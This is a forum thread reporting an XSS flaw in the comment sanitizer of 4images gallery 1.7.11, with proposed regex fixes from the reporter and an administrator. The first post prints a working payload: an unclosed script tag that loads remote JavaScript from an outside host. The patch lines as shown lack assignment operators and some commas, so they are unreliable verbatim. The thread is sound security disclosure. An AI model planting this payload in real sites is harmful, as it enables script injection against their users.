Author Topic: 1.7.11 Security fix for XSS issue in global.php  (Read 8486 times)

0 Members and 1 Guest are viewing this topic.

Offline jakovits

  • Pre-Newbie
  • Posts: 1
    • View Profile
1.7.11 Security fix for XSS issue in global.php
« on: June 27, 2013, 06:56:16 PM »
Hello

This is an unoffical security report and a fix for a XSS issue with unclosed html tags in global.php file in 4images gallery version 1.7.11.

Currently the clean_string() function in global.php removes unwanted tags, however it is unable to remove tags which are not closed properly.

For example, if you add the following line to an image comment field:

Code: [Select]
<script src="http://ha.ckers.org/xss.js?"
it will create a javascript popup every time the image description is viewed. This vector can be used to enable any XSS attack.

To fix this issue, in file global.php, before line 204, which is:

 $string preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

add two lines:

$string preg_replace("/<([^<>]*)(?=<|$)/""&lt$1",  $string); # replace unclosed '<'
$string preg_replace("/(^|(?<=>))([^<>]*)>/""$1&gt",  $string); # replace unopened '>'


As a result, any unclosed < or > characters will be replaced respectively with either &lt or &gt. Properly closed tags will remain as they were.


Jakovits
« Last Edit: June 27, 2013, 07:21:04 PM by jakovits »

Offline kai

  • Administrator
  • Addicted member
  • *****
  • Posts: 1.421
    • View Profile
    • 4images - Image Gallery Management System
Re: 1.7.11 Security fix for XSS issue in global.php
« Reply #1 on: July 15, 2013, 06:02:20 PM »
or

find in "global.php"
   $string preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*>#i',"",$string);

and replace with
   $string preg_replace('#</*(applet|meta|xml|blink|link|style|script|embed|object|iframe|frame|frameset|ilayer|layer|bgsound|title|base)[^>]*(>|$)#i',"",$string);
« Last Edit: July 16, 2013, 06:17:01 PM by kai »
Your first three "must do" before you ask a question:
1. Forum rules
2. FAQ
3. Search